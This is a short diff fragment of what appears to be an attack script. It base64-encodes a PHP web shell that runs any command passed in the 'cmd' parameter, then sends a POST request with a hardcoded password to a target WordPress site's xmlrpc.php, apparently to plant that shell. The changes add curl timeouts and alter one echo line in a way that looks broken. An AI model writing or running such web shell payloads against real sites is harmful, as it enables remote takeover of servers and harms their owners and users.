 <param><value><string>password123</string></value></param></params></methodCall>")

-WEBSHELL_B64=$(echo '<?php system($_GET["cmd"]); ?>' | base64 | tr -d '%0A%0D')
+WEBSHELL_B64=$(echo'<?php system($_GET["cmd"]); ?>' | base64 | tr -d '%0A%0D')

-curl -sk -X POST "https://$TARGET/xmlrpc.php" \
+curl --max-time 30 --connect-timeout 10 -sk -X POST "https://$TARGET/xmlrpc.php" \

 -H "Content-Type: text/xml" \